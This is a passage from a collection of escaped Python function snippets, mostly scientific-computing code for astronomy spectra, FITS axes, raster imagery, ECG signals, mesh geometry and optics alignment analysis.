old_units[-1] = 'Degrees'\n totals.set_axes(new_axes,anames=old_names,aunits=old_units)\n \n # Finally, cluster points together if they are close enough\n\n if cluster[0] > 0:\n totals,extra_info_string = debunch(totals,cluster)\n info_string += extra_info_string\n \n axislist = map(lambda a:a.title,totals.axes)\n print 'Axes: ' + `axislist`\n\n totals.add_metadata(\"_pd_proc_info_data_reduction\",info_string,append=True)\n\n # normalize result if required\n if normalization > 0:\n rescale(totals,normalization)\n return totals", "def extract_kernel_and_coords(spec_ds,x,y,width,height,band,transform):\r\n xoffset = int(x - transform[0])/30 - width/2\r\n yoffset = int(y - transform[3])/-30 - height/2\r\n\r\n x_indeces = numpy.arange(xoffset, xoffset+width)\r\n y_indeces = numpy.arange(yoffset, yoffset+height)\r\n x_coords = x_indeces * transform[1] + transform[0] \r\n y_coords = y_indeces * transform[5] + transform[3] \r\n all_coords = numpy.zeros([x_coords.size,y_coords.size,2])\r\n for ind, i in enumerate(x_coords):\r\n for jnd, j in enumerate(y_coords):\r\n all_coords[jnd,ind] = (i,j) \r\n\r\n # plot is outside the image boundary\r\n if xoffset <0 or yoffset > spec_ds.RasterYSize - 1:\r\n return [-9999]\r\n this_band = spec_ds.GetRasterBand(band)\r\n specs = this_band.ReadAsArray(xoffset, yoffset, width, height)\r\n return specs, all_coords", "def dim_calculator():\r\n probe_set = np.arange(1, 101)\r\n X = -36 + ((probe_set - 1) // 10) * 4\r\n Y = 2 - ((probe_set - 1) % 10) * 4\r\n dim = np.vstack((X, Y)).T\r\n return dim", "def _get_indice(cls, w, flux, blue, red, band=None, unit='ew', degree=1,\n **kwargs):\n wi, fi = cls.continuum_normalized_region_around_line(w, flux, blue,\n red, band=band,\n degree=degree)\n if unit in (0, 'ew', 'EW'):\n return np.trapz(1. - fi, wi, axis=-1)\n else:\n m = np.trapz(fi, wi, axis=-1)\n m = -2.5 * np.log10(m / np.ptp(wi))\n return m", "def _get_indice(cls, w, flux, blue, red, band=None, unit='ew', degree=1,\n **kwargs):\n wi, fi = cls.continuum_normalized_region_around_line(w, flux, blue,\n red, band=band,\n degree=degree)\n if unit in (0, 'ew', 'EW'):\n return np.trapz(1. - fi, wi, axis=-1)\n else:\n m = np.trapz(fi, wi, axis=-1)\n m = -2.5 * np.log10(m / np.ptp(wi))\n return m", "def get_normal_segment_idx(ecg, ratio_lb, ratio_ub, diagPlot=False):\n ecg_sd = ecg.std(axis=1)\n ecg_sd_med = np.median(ecg_sd)\n idx_valid = (ecg_sd < ecg_sd_med * ratio_ub) & (ecg_sd > ecg_sd_med * ratio_lb)\n\n if diagPlot:\n plt.figure()\n for i in range(ecg.shape[0]):\n if idx_valid[i] == 0:\n plt.plot(np.arange(6000) + 6000 * i, ecg[i, :], \"r-\")\n else:\n plt.plot(np.arange(6000) + 6000 * i, ecg[i, :], \"b-\")\n # plt.show()\n\n return idx_valid", "def getNbins(self,axis,includeTotalBin = True):\n\n\t\tif axis == \"f\":\n\t\t\tnCells = 1 if self.nCells == 0 else self.nCells\n\t\t\treturn nCells\n\n\t\tif axis == \"i\":\n\t\t\treturn self.meshInfo[1]\n\n\t\tif axis == \"j\":\n\t\t\treturn self.meshInfo[2]\n\n\t\tif axis == \"k\":\n\t\t\treturn self.meshInfo[3]\n\n\t\tif axis == \"d\":\n\t\t\tnDir = 1 if self.nDir == 0 else self.nDir\n\t\t\treturn nDir\n\n\t\tif axis == \"u\":\n\t\t\tnUsr = 1 if self.nUsr == 0 else self.nUsr\n\t\t\tnUsr = nUsr - 1 if self.usrTC == \"t\" and not includeTotalBin else nUsr\n\t\t\treturn nUsr\n\n\t\tif axis == \"s\":\n\t\t\tnSeg = 1 if self.nSeg == 0 else self.nSeg\n\t\t\tnSeg = nSeg - 1 if self.segTC == \"t\" and not includeTotalBin else nSeg\n\t\t\treturn nSeg\n\n\t\tif axis == \"m\":\n\t\t\tnMul = 1 if self.nMul == 0 else self.nMul\n\t\t\tnMul = nMul - 1 if self.mulTC == \"t\" and not includeTotalBin else nMul\n\t\t\treturn nMul\n\n\t\tif axis == \"c\":\n\t\t\tnCos = 1 if self.nCos == 0 else self.nCos\n\t\t\tnCos = nCos - 1 if self.cosTC == \"t\" and not includeTotalBin else nCos\n\t\t\treturn nCos\n\n\t\tif axis == \"e\":\n\t\t\tnErg = 1 if self.nErg == 0 else self.nErg\n\t\t\tnErg = nErg - 1 if self.ergTC == \"t\" and not includeTotalBin else nErg\n\t\t\treturn nErg\n\n\t\tif axis == \"t\":\n\t\t\tnTim = 1 if self.nTim == 0 else self.nTim\n\t\t\tnTim = nTim - 1 if self.timTC == \"t\" and not includeTotalBin else nTim\n\t\t\treturn nTim", "def feature_axes(self):\n raise NotImplementedError()", "def _output_axes(self, in_obj, pad_int):\n output_axes = ng.make_axes()\n for ax in in_obj.axes:\n name = ax.name\n if name in self.conv_axis_names:\n output_axes += ng.make_axis(name=ax.name,\n length=utils.deconv_output_dim(ax.length,\n self.filter_shape[name],\n pad_int[name],\n self.strides[name],\n self.dilation[name]))\n elif name == \"C\":\n output_axes += ng.make_axis(name=name, length=self.nout)\n else:\n output_axes += ax\n\n return output_axes", "def hapaxes_parts(corpus_parts):\n hapaxes = [] \n l = [] \n for part in corpus_parts:\n fd = freq_dist(part)\n hapaxes.append(fd.hapaxes())\n \n for x in range(len(hapaxes)): \n p = []\n for hapax in hapaxes[x]:\n if hapax not in l:\n p.append(hapax)\n hapaxes[x] = p\n l.extend(hapaxes[x])\n\n number_hapaxes = [len(sub_hapaxes) for sub_hapaxes in hapaxes]\n return number_hapaxes", "def comp_amplification_index(self):\n \n self.grid_tuning_in=self.inputs.grid_tuning_in\n self.grid_tuning_out=gl.comp_grid_tuning_index(self.L,self.nx,(self.r[0:self.n_e**2,:]).T) \n self.grid_tuning_out_inhib=gl.comp_grid_tuning_index(self.L,self.nx,(self.r[self.n_e**2:,:]).T)\n\n self.grid_amp_index=self.grid_tuning_out/self.grid_tuning_in", "def _index(self):\n bFirstCall = super(PageXmlSeparatorRegion, self)._index()\n \n if bFirstCall:\n # indexing was required\n # , so first call\n # , so we need to make the computation of edges crossing separators!\n self.addSeparatorFeature()", "def layer_offsets(self):\n ...", "def refractive_index(self):\n wd = np.arange(80,820,10)\n nd = self.boundary.imat.refractive_index(wd) \n\n plt.plot(wd, nd)\n\n return wd, nd", "def mesh_axes(mesh) :\n \n if (mesh.dimension() == 1) :\n # for 1D, we take the cell center points\n x = np.zeros(mesh.number_cells_x())\n x[0] = mesh.dx(0) * 0.5\n for i in range(0, mesh.number_cells_x()-1) :\n x[i + 1] = x[i] + 0.5*(mesh.dx(i) + mesh.dx(i+1))\n return x \n \n else :\n # for 2D, we take the mesh edges\n x = np.zeros(mesh.number_cells_x()+1)\n y = np.zeros(mesh.number_cells_y()+1)\n for i in range(0, mesh.number_cells_x()) :\n x[i + 1] = x[i] + mesh.dx(i)\n for j in range(0, mesh.number_cells_y()) :\n y[j + 1] = y[j] + mesh.dy(j)\n return (x, y)", "def footprint_corner_indices():", "def find_signal_morphology(rr_intervals, fs: float = 4):\n baseline = calculate_time_features(rr_intervals=rr_intervals)['baseline']\n vhr = rr_intervals - baseline\n accel_values = np.sort(vhr[vhr > 15]) # Change for right value\n decel_values = np.sort(vhr[vhr < -15]) # Change for right value\n accel_args = np.zeros(accel_values.shape, dtype=int)\n decel_args = np.zeros(decel_values.shape, dtype=int)\n acceleration_array = []\n deceleration_array = []\n k = 0\n for i, x in enumerate(vhr):\n if x in accel_values:\n accel_args[k] = int(i)\n k += 1\n # Make acceleration array of tuples (start, end)\n if np.sum(accel_values > 0):\n start = accel_args[0]\n end = accel_args[0]\n for i in range(len(accel_args) - 1):\n if (accel_args[i + 1] - accel_args[i] >= 2) or (i + 1 == len(accel_args) - 1):\n acceleration_array.append((start, end))\n start = accel_args[i + 1]\n else:\n end = accel_args[i + 1]\n # Make deceleration array of tuples (start, end)\n k = 0\n for i, x in enumerate(vhr):\n if x in decel_values:\n decel_args[k] = i\n k += 1\n if np.sum(decel_values < 0) > 2:\n start = decel_args[0]\n end = decel_args[0]\n for i in range(len(decel_args) - 1):\n if (decel_args[i + 1] - decel_args[i] >= 2) or (i + 1 == len(decel_args)):\n deceleration_array.append((start, end))\n start = decel_args[i + 1]\n else:\n end = decel_args[i + 1]\n delete_array = np.concatenate((accel_args, decel_args))\n vhr_pure = np.delete(vhr, delete_array)\n AmpStd = np.sqrt(np.mean(np.square(vhr_pure)))\n return baseline, AmpStd, acceleration_array, deceleration_array", "def parse_mesh_point(self,sections,section_handlers):\n\n for (section_name,tokenized_lines) in sections:\n if section_name in section_handlers:\n section_handlers[section_name](self,tokenized_lines)", "def direction(self):\n import pylab\n i = 0\n j = 0\n vals = []\n vects = []\n kpx = self.keypoints.x\n kpy = self.keypoints.y\n sigma = self.keypoints.sigma\n img = self.raw\n pylab.figure()\n pylab.imshow(img, interpolation='nearest')\n\n for y, x, s in zip(kpy, kpx, sigma):\n s_patch = numpy.trunc(s * 2)\n\n if s_patch % 2 == 0 :\n s_patch += 1\n\n if s_patch < 3 : s_patch = 3\n\n if (x > s_patch / 2 and x < img.shape[1] - s_patch / 2 - 1 and y > s_patch / 2 and y < img.shape[0] - s_patch / 2):\n\n patch = img[y - (s_patch - 1) / 2:y + (s_patch - 1) / 2 + 1, x - (s_patch - 1) / 2:x + (s_patch - 1) / 2 + 1]\n x_patch = numpy.arange(s_patch)\n Gx = numpy.exp(-4 * numpy.log(2) * (x_patch - numpy.median(x_patch)) ** 2 / s)\n Gy = Gx[:, numpy.newaxis]\n dGx = -Gx * 4 * numpy.log(2) / s * 2 * (x_patch - numpy.median(x_patch))\n dGy = dGx[:, numpy.newaxis]\n d2Gx = -8 * numpy.log(2) / s * ((x_patch - numpy.median(x_patch)) * dGx + Gx)\n d2Gy = d2Gx[:, numpy.newaxis]\n\n Hxx = d2Gx * Gy\n Hyy = d2Gy * Gx\n Hxy = dGx * dGy\n\n d2x = (Hxx.ravel() * patch.ravel()).sum()\n d2y = (Hyy.ravel() * patch.ravel()).sum()\n dxy = (Hxy.ravel() * patch.ravel()).sum()\n H = numpy.array([[d2y, dxy], [dxy, d2x]])\n val, vect = numpy.linalg.eig(H)\n\n# print 'new point'\n# print x, y\n# print val\n# print vect\n# print numpy.dot(vect[0],vect[1])\n e = numpy.abs(val[0] - val[1]) / numpy.abs(val[0] + val[1])\n j += 1\n# print j\n# print e\n if numpy.abs(val[1]) < numpy.abs(val[0]): # reorganisation des valeurs propres et vecteurs propres\n val[0],val[1] = val[1],val[0]\n vect = vect[-1::-1,:]\n\n\n pylab.annotate(\"\", xy=(x + vect[0][0] * val[0], y + vect[0][1] * val[0]), xytext=(x, y),\n arrowprops=dict(facecolor='red', shrink=0.05),)\n\n pylab.annotate(\"\", xy=(x + vect[1][0] * val[1], y + vect[1][1] * val[1]), xytext=(x, y),\n arrowprops=dict(facecolor='red', shrink=0.05),)\n pylab.plot(x, y, 'og')\n vals.append(val)\n vects.append(vect)\n return vals, vects", "def _format_cont_ins(col: str, data: Dict[str, Any], nrows: int, cfg: Config) -> Any:\n # list of insights\n ins: List[Dict[str, str]] = []\n\n if data[\"chisq\"][1] > cfg.insight.uniform__threshold:\n ins.append({\"Uniform\": f\"/*start*/{col}/*end*/ is uniformly distributed\"})\n\n pmiss = round((1 - (data[\"npres\"] / nrows)) * 100, 2)\n if pmiss > cfg.insight.missing__threshold:\n nmiss = nrows - data[\"npres\"]\n ins.append({\"Missing\": f\"/*start*/{col}/*end*/ has {nmiss} ({pmiss}%) missing values\"})\n\n if data[\"skew\"][1] < cfg.insight.skewed__threshold:\n ins.append({\"Skewed\": f\"/*start*/{col}/*end*/ is skewed\"})\n\n pinf = round((data[\"npres\"] - data[\"nreals\"]) / nrows * 100, 2)\n if pinf >= cfg.insight.infinity__threshold:\n ninf = data[\"npres\"] - data[\"nreals\"]\n ins.append({\"Infinity\": f\"/*start*/{col}/*end*/ has {ninf} ({pinf}%) infinite values\"})\n\n pzero = round(data[\"nzero\"] / nrows * 100, 2)\n if pzero > cfg.insight.zeros__threshold:\n nzero = data[\"nzero\"]\n ins.append({\"Zeros\": f\"/*start*/{col}/*end*/ has {nzero} ({pzero}%) zeros\"})\n\n pneg = round(data[\"nneg\"] / nrows * 100, 2)\n if pneg > cfg.insight.negatives__threshold:\n nneg = data[\"nneg\"]\n ins.append({\"Negatives\": f\"/*start*/{col}/*end*/ has {nneg} ({pneg}%) negatives\"})\n\n if data[\"norm\"][1] > cfg.insight.normal__threshold:\n ins.append({\"Normal\": f\"/*start*/{col}/*end*/ is normally distributed\"})\n\n # list of insight messages\n ins_msg_list = [list(insight.values())[0] for insight in ins]\n\n return ins_msg_list, ins", "def getMeasures():", "def dimension(self):", "def get_entang(self, axes_subset):\n self.x_axes = list(axes_subset)\n num_x_axes = len(self.x_axes)\n num_row_axes = len(self.den_mat.row_shape)\n self.y_axes = [k for k in range(num_row_axes) if k not in self.x_axes]\n num_y_axes = len(self.y_axes)\n self.Dxy = self.den_mat.get_rho_xy(self.x_axes, self.y_axes)\n Dxy_a = []\n\n # initial Dxy_a\n # Dxy_a[0] = Dxy,\n # all others are max entangled\n dm_max_ent = DenMat(self.Dxy.num_rows, self.Dxy.row_shape)\n x_axes0 = list(range(num_x_axes))\n y_axes0 = list(range(num_x_axes, num_row_axes, 1))\n max_ent_st = MaxEntangState(dm_max_ent.num_rows, dm_max_ent.row_shape,\n x_axes0, y_axes0)\n EntangCase.check_max_entang_st(max_ent_st)\n st_vec = max_ent_st.get_st_vec()\n entang = max_ent_st.get_known_entang()\n dm_max_ent.set_arr_from_st_vec(st_vec)\n # print('dddddd dm max ent', dm_max_ent.arr)\n for alp in range(self.num_hidden_states):\n if alp == 0:\n Dxy_alp = self.Dxy\n else:\n Dxy_alp = dm_max_ent\n Dxy_a.append(Dxy_alp)\n\n for step in range(self.num_ab_steps):\n if self.verbose:\n print('------------ab step=', step)\n print('entang=', entang)\n entang, Dxy_a = self.next_step(Dxy_a)\n if self.verbose:\n print('-----------\\nfinal entang=', entang)\n return entang", "def nominalSensitivities():\n #Scan ranges\n ang = np.linspace(-5*.3e-3,5*.3e-3,100)\n tx = np.linspace(-.3,.3,100)\n\n #Mirror Pair Sensitivities\n pitch2 = [mirrorPair(1000,primalign=[0,0,0,0,a,0]) for a in ang]\n yaw2 = [mirrorPair(1000,primalign=[0,0,0,a,0,0]) for a in ang]\n plt.figure('Pair')\n plt.plot(ang*180/pi*60,pitch2,label='Pitch')\n plt.plot(ang*180/pi*60,yaw2,label='Yaw')\n plt.title('SLF Mirror Pair Alignment Sensitivities')\n plt.grid()\n plt.legend(loc='upper center')\n plt.xlabel('Angular Error (arcmin)')\n plt.ylabel('HPD (arcsec)')\n\n #Secondary Sensitivities\n pitch = [mirrorPair(1000,secalign=[0,0,0,0,a,0]) for a in ang/20]\n yaw = [mirrorPair(1000,secalign=[0,0,0,a,0,0]) for a in ang/20]\n roll = [mirrorPair(1000,secalign=[0,0,0,0,0,a]) for a in ang/20]\n plt.figure('SecondaryAng')\n plt.semilogy(ang/20.*180/pi*60**2,pitch,label='Pitch')\n plt.plot(ang/20.*180/pi*60**2,yaw,label='Yaw')\n plt.plot(ang/20.*180/pi*60**2,roll,label='Roll')\n plt.grid()\n plt.legend(loc='upper center')\n plt.xlabel('Angular Error (arcsec)')\n plt.ylabel('HPD (arcsec)')\n plt.xlim([-5,5])\n plt.ylim([0,3])\n plt.title('SLF Secondary Alignment Sensitivities')\n decenter = [mirrorPair(1000,secalign=[t,0,0,0,0,0]) for t in tx]\n lateral = [mirrorPair(1000,secalign=[0,t,0,0,0,0]) for t in tx]\n despace = [mirrorPair(1000,secalign=[0,0,t,0,0,0]) for t in tx]\n plt.figure('SecondaryTx')\n plt.semilogy(tx,decenter,label='Decenter')\n plt.plot(tx,despace,label='Despace')\n plt.plot(tx,lateral,label='Lateral')\n plt.grid()\n plt.legend(loc='upper center')\n plt.xlabel('Translation Error (mm)')\n plt.ylabel('HPD (arcsec)')\n plt.title('SLF Secondary Translation Sensitivities')\n \n \n #Compensating behavior...\n \n\n return [pitch2,yaw2,pitch,yaw,decenter,lateral,despace]", "def _make_axes(self, hdr, quiet=False, novec=False, vonly=False, simple=False):\n\n # PULL THE IMAGE/CUBE SIZES FROM THE HEADER\n naxis = int(hdr['NAXIS'])\n naxis1 = int(hdr['NAXIS1'])\n naxis2 = int(hdr['NAXIS2'])\n if naxis > 2:\n naxis3 = hdr['NAXIS3']\n\n ## EXTRACT FITS ASTROMETRY STRUCTURE\n ww = astropy.wcs.WCS(hdr)\n\n #IF DATASET IS A CUBE THEN WE MAKE THE THIRD AXIS IN THE SIMPLEST WAY POSSIBLE (NO COMPLICATED ASTROMETRY WORRIES FOR FREQUENCY INFORMATION)\n if naxis > 3:\n #GRAB THE RELEVANT INFORMATION FROM THE ASTROMETRY HEADER\n cd = ww.wcs.cd\n crpix = ww.wcs.crpix\n cdelt = ww.wcs.crelt\n crval = ww.wcs.crval\n\n if naxis > 2:\n # MAKE THE VELOCITY AXIS (WILL BE M/S)\n v = np.arange(naxis3) * 1.0\n vdif = v - (hdr['CRPIX3']-1)\n vaxis = (vdif * hdr['CDELT3'] + hdr['CRVAL3'])\n\n # CUT OUT HERE IF WE ONLY WANT VELOCITY INFO\n if vonly:\n return vaxis\n\n #IF 'SIMPLE' IS CALLED THEN DO THE REALLY TRIVIAL THING:\n if simple:\n print('Using simple aproach to make axes.')\n print('BE SURE THIS IS WHAT YOU WANT! It probably is not.')\n raxis = np.arange(naxis1) * 1.0\n rdif = raxis - (hdr['CRPIX1'] - 1)\n raxis = (rdif * hdr['CDELT1'] + hdr['CRVAL1'])\n\n daxis = np.arange(naxis2) * 1.0\n ddif = daxis - (hdr['CRPIX1'] - 1)\n daxis = (ddif * hdr['CDELT1'] + hdr['CRVAL1'])\n\n rimg = raxis # (fltarr(naxis2) + 1.)\n dimg = (np.asarray(naxis1) + 1.) # daxis\n return rimg, dimg\n\n # OBNOXIOUS SFL/GLS THING\n glspos = ww.wcs.ctype[0].find('GLS')\n if glspos != -1:\n ctstr = ww.wcs.ctype[0]\n newtype = 'SFL'\n ctstr.replace('GLS', 'SFL')\n ww.wcs.ctype[0] = ctstr\n print('Replaced GLS with SFL; CTYPE1 now =' + ww.wcs.ctype[0])\n\n glspos = ww.wcs.ctype[1].find('GLS')\n if glspos != -1:\n ctstr = ww.wcs.ctype[1]\n newtype = 'SFL'\n ctstr.replace('GLS', 'SFL')\n ww.wcs.ctype[1] = ctstr\n print('Replaced GLS with SFL; CTYPE2 now = ' + ww.wcs.ctype[1])\n\n # CALL 'xy2ad' TO FIND THE RA AND DEC FOR EVERY POINT IN THE IMAGE\n if novec:\n rimg = np.zeros((naxis1, naxis2))\n dimg = np.zeros((naxis1, naxis2))\n for i in range(naxis1):\n j = np.asarray([0 for i in xrange(naxis2)])\n\n pixcrd = np.array([[zip(float(i), float(j))]], numpy.float_)\n ra, dec = ww.all_pix2world(pixcrd, 1)\n\n rimg[i, :] = ra\n dimg[i, :] = dec\n else:\n ximg = np.arange(naxis1) * 1.0\n yimg = np.arange(naxis1) * 1.0\n X, Y = np.meshgrid(ximg, yimg, indexing='xy')\n ss = X.shape\n xx, yy = X.flatten(), Y.flatten()\n\n pixcrd = np.array(zip(xx, yy), np.float_)\n img_new = ww.all_pix2world(pixcrd, 0)\n rimg_new, dimg_new = img_new[:,0], img_new[:,1]\n\n rimg = rimg_new.reshape(ss)\n dimg = dimg_new.reshape(ss)\n\n # GET AXES FROM THE IMAGES. USE THE CENTRAL COLUMN AND CENTRAL ROW\n raxis = np.squeeze(rimg[:, naxis2/2])\n daxis = np.squeeze(dimg[naxis1/2, :])\n\n return rimg, dimg", "def InferElementalDimension(self):\n\n assert self.element_type is not None\n\n if self.element_type == \"tet\" or self.element_type == \"hex\":\n self.edim = 3\n elif self.element_type == \"tri\" or self.element_type == \"quad\" or self.element_type == \"pent\":\n self.edim = 2\n elif self.element_type == \"line\":\n self.edim = 1\n else:\n raise RuntimeError(\"Could not infer element type\")\n\n return self.edim", "def getPlotData(integrated):\n\tglobal normalized\n\tg1 = integrated.split(\"_\")[0]\n\tg2 = integrated.split(\"_\")[1] \n\tcompAxis = []\n\twarmthAxis = []\n\tgetMappingsWarmth = parser.getMappings(normalized)[0]\n\tgetMappingsComp = parser.getMappings(normalized)[1]\n\tintWarmthMap, intCompMap = parser.extractInformation(getMappingsWarmth, getMappingsComp)\n\n\t#using mean and standard deviation computed from 18aug16 data: \n\tcompAxis.append(intCompMap[g1][0]) #group 1\n\tcompAxis.append(intCompMap[g2][0]) #group 2\n\n\tcompAxis.append(intCompMap[integrated][0]) #combined observed\n\t\n\t#using mean and standard deviation computed from 18aug16 data: \n\tcompPrediction = getCombination(float(intCompMap[g1][0]), float(intCompMap[g2][0]), float(intCompMap[g1][1]), float(intCompMap[g2][1]), float(intCompMap[g1][2]), float(intCompMap[g2][2]))\n\t\n\tcompAxis.append(compPrediction[0]) #combined predicted\n\t\n\t#using mean and standard deviation computed from 18aug16 data: \n\twarmthAxis.append(intWarmthMap[g1][0])\n\twarmthAxis.append(intWarmthMap[g2][0])\n\t\n\twarmthAxis.append(intWarmthMap[integrated][0])\n\t\n\t#using mean and standard deviation computed from 18aug16 data: \n\twarmthPrediction = getCombination(float(intWarmthMap[g1][0]), float(intWarmthMap[g2][0]), float(intWarmthMap[g1][1]), float(intWarmthMap[g2][1]), float(intWarmthMap[g1][2]), float(intWarmthMap[g2][2]))\n\t\n\twarmthAxis.append(warmthPrediction[0])\n\treturn warmthAxis, compAxis", "def dimension_finder(self, text_header):\r\n dimension = re.search('\\d+x\\d+',text_header).group()\r\n dimension1 = re.findall('\\d+',dimension)[0]\r\n dimension1 = float(dimension1)\r\n dimension2 = re.findall('\\d+',dimension)[1]\r\n dimension2 = float(dimension2)\r\n return (dimension1,dimension2)", "def xx(self):\n return self.exterior[:, 0]", "def flatNoiseCGH():\n #Get data\n wdir = '/home/rallured/Dropbox/AXRO/Metrology/NoiseStudy/FlatMeasurements/'\n d1,dx1 = met.read4DFits(wdir+'161205_RefFlat_Avg8_Meas1.fits')\n d2,dx2 = met.read4DFits(wdir+'161205_RefFlat_Avg8_Meas2.fits')\n p1,px1 = met.read4DFits(wdir+'161205_RefFlat_ParrotingTestPitch_Meas1.fits')\n p2,px2 = met.read4DFits(wdir+'161205_RefFlat_ParrotingTestPitch_Meas2.fits')\n p3,px3 = met.read4DFits(wdir+'161205_RefFlat_ParrotingTestRoll_Meas1.fits')\n p4,px4 = met.read4DFits(wdir+'161205_RefFlat_ParrotingTestRoll_Meas2.fits')\n\n #Construct baseline power spectra\n f1,pow1 = fourier.meanPSD(d1-d2,win=np.hanning,dx=dx1)\n f2,pow2 = fourier.meanPSD(d1-d2,win=np.hanning,dx=dx1,axis=1)\n \n #Construct parroted power spectra\n f3,pow3 = fourier.meanPSD(p1-p2,win=np.hanning,dx=dx1)\n f4,pow4 = fourier.meanPSD(p1-p2,win=np.hanning,dx=dx2,axis=1)\n f5,pow5 = fourier.meanPSD(p3-p4,win=np.hanning,dx=dx1)\n f6,pow6 = fourier.meanPSD(p3-p4,win=np.hanning,dx=dx2,axis=1)\n\n #Plot\n plt.loglog(f1,pow1/f1[0],label='Axial Baseline')\n plt.loglog(f2,pow2/f2[0],label='Azimuthal Baseline')\n plt.loglog(f3,pow3/f3[0],label='Pitch Axial')\n plt.loglog(f4,pow4/f4[0],label='Pitch Azimuthal')\n plt.loglog(f5,pow5/f5[0],label='Roll Axial')\n plt.loglog(f6,pow6/f6[0],label='Roll Azimuthal')\n plt.title('Residual Fringe Repeatability Impact')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n plt.legend(loc='lower left')\n\n return f1,pow1", "def getVisualFieldOrigin(self):\r\n\r\n if not hasattr(self, 'finalPatchesMarked'):\r\n raise LookupError('Please mark the final patches first!!')\r\n\r\n if not hasattr(self, 'altPosMapf'):\r\n _ = self._getSignMap()\r\n\r\n try:\r\n V1 = self.finalPatchesMarked['V1'].array.astype(np.float)\r\n LM = self.finalPatchesMarked['LM'].array.astype(np.float)\r\n RL = self.finalPatchesMarked['RL'].array.astype(np.float)\r\n\r\n overlap = 0 # number of overlaping pixels\r\n iterNum = 1 # number of iteration\r\n while overlap < 1:\r\n # print 'Iteration number for finding overlapping pixel:', iterNum\r\n V1 = ni.morphology.binary_dilation(V1, iterations=1).astype(np.float)\r\n LM = ni.morphology.binary_dilation(LM, iterations=1).astype(np.float)\r\n RL = ni.morphology.binary_dilation(RL, iterations=1).astype(np.float)\r\n totalField = V1 + LM + RL\r\n # plt.imshow(totalField)\r\n overlap = len(np.argwhere(totalField == 3))\r\n iterNum += 1\r\n # print 'Number of overlapping pixels:', overlap\r\n # plt.show()\r\n\r\n altPosOrigin = np.mean(self.altPosMapf[totalField == 3], axis=0)\r\n aziPosOrigin = np.mean(self.aziPosMapf[totalField == 3], axis=0)\r\n\r\n except KeyError:\r\n print('Can not find necessary visual areas (V1, LM, RL) for normalization. \\nSetting origins to 0 ...')\r\n altPosOrigin = 0.\r\n aziPosOrigin = 0.\r\n\r\n return altPosOrigin, aziPosOrigin", "def _appendAxisDefinition(self, axis):\n length = len(axis)\n\n self.na_dict[\"NX\"].append(length)\n self.na_dict[\"XNAME\"].append(xarray_utils.getBestName(axis))\n\n # If only one item in axis values\n if length < 2:\n self.na_dict[\"DX\"].append(0)\n self.na_dict[\"NXDEF\"].append(length)\n self.na_dict[\"X\"].append(axis.data.tolist()) \n return\n\n incr = xarray_utils.get_interval(axis, 0, 1)\n\n for i in range(1, length):\n if (axis[i] - axis[i - 1]) != incr:\n self.na_dict[\"DX\"].append(0)\n self.na_dict[\"NXDEF\"].append(length)\n self.na_dict[\"X\"].append(axis.data.tolist())\n break\n\n else: # If did not break out of the loop\n max_length = length\n if length > 3: \n max_length = 3\n\n self.na_dict[\"DX\"].append(incr)\n self.na_dict[\"NXDEF\"].append(max_length)\n self.na_dict[\"X\"].append(axis[:max_length])", "def _cte_postformat(self):\n# if type(self.idxs) == list:\n# self.idxs = np.array(self.idxs)\n if self.sp_relative_pos is not None:\n if type(self.sp_relative_pos) == list:\n self.sp_relative_pos = np.array(self.sp_relative_pos)", "def calc_ind(sel_lines):\n\n print()\n print(\"CALCULATING INDICES\")\n print(\"-------------------\")\n\n # remove duplicates of ind_id and gives a list of selected indices\n sel_ind = list(set(sel_lines['ind_id']))\n sel_ind = np.asarray(sel_ind)\n\n index = {}\n index['index'] = []\n index['value'] = []\n index['error'] = []\n index['flg'] = []\n index['mfrac_neg'] = []\n index['snr'] = []\n\n print(\"index\\tvalue\\terror\\t\\tsnr\\tflag\\tmfrac_neg\")\n print(\"-----\\t-----\\t-----\\t\\t---\\t----\\t---------\")\n\n ind_ids = np.asarray(sel_lines['ind_id'])\n rows = len(sel_lines['ln_id'])\n for i in range(len(sel_ind)): # each index\n\n var = [sel_lines['ind_var'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n flux = [sel_lines['flux'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n err = [sel_lines['error'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n flg = [sel_lines['flg'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n frac_neg = [sel_lines['frac_neg'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n snr = [sel_lines['snr'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n ln_c = [sel_lines['ln_c'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n\n # Maximum fraction of flux with negative values of all lines in index\n mfrac_neg = max(frac_neg)\n\n if \"negFlux\" in flg: flg_ind = 'negFlux'\n else: flg_ind = None\n\n # Median snr of index bandpasses:\n if snr is None or snr[0] is None:\n snr_ind = None\n else:\n snr_ind = np.median(snr)\n\n for k in range(len(var)):\n if 'L' not in var[k] and 'R' not in var[k]:\n msg=\"*** ERROR: 'ind_var' variable (in config file config_lines.txt) must start with either an 'L' for core line or 'R' for reference line. Value given was '{}'\".format(var[k])\n sys.exit(msg)\n\n # Add line variables for numerator or denominator:\n num = [ln_c[k]*flux[k] for k in range(len(var)) if 'L' in var[k]]\n num_err = [ln_c[k]*err[k] for k in range(len(var)) if 'L' in var[k]]\n denom = [ln_c[k]*flux[k] for k in range(len(var)) if 'R' in var[k]]\n denom_err = [ln_c[k]*err[k] for k in range(len(var)) if 'R' in var[k]]\n\n num = np.asarray(num)\n denom = np.asarray(denom)\n num_err = np.asarray(num_err)\n denom_err = np.asarray(denom_err)\n\n ind = sum(num) / sum(denom)\n\n # Error using propagation of errors for lines and ref lines\n ind_err = np.sqrt(sum(num_err**2) + ind**2 * sum(denom_err**2)) /sum(denom)\n\n if snr_ind: snr_ind = round(snr_ind, 2)\n\n index['index'].append(sel_ind[i])\n index['value'].append(ind)\n index['error'].append(ind_err)\n index['flg'].append(flg_ind)\n index['mfrac_neg'].append(mfrac_neg)\n index['snr'].append(snr_ind)\n\n print(\"{}\\t{:.4f}\\t{:.6f}\\t{}\\t{}\\t{:.4f}\".format(index['index'][i], index['value'][i], index['error'][i], index['snr'][i], index['flg'][i], index['mfrac_neg'][i]))\n\n return index", "def side_traces(x,im):\n s0 = x['side-traces'][0]\n s1 = x['side-traces'][1]\n t1 = Scatter(y=s0)\n t2 = Scatter(y=s1)\n\n #put_thing(im,x['abs-line'],(255,0,0),(0,0),3)\n\n groups = []\n diff_traces = []\n markers = []\n y3 = []\n 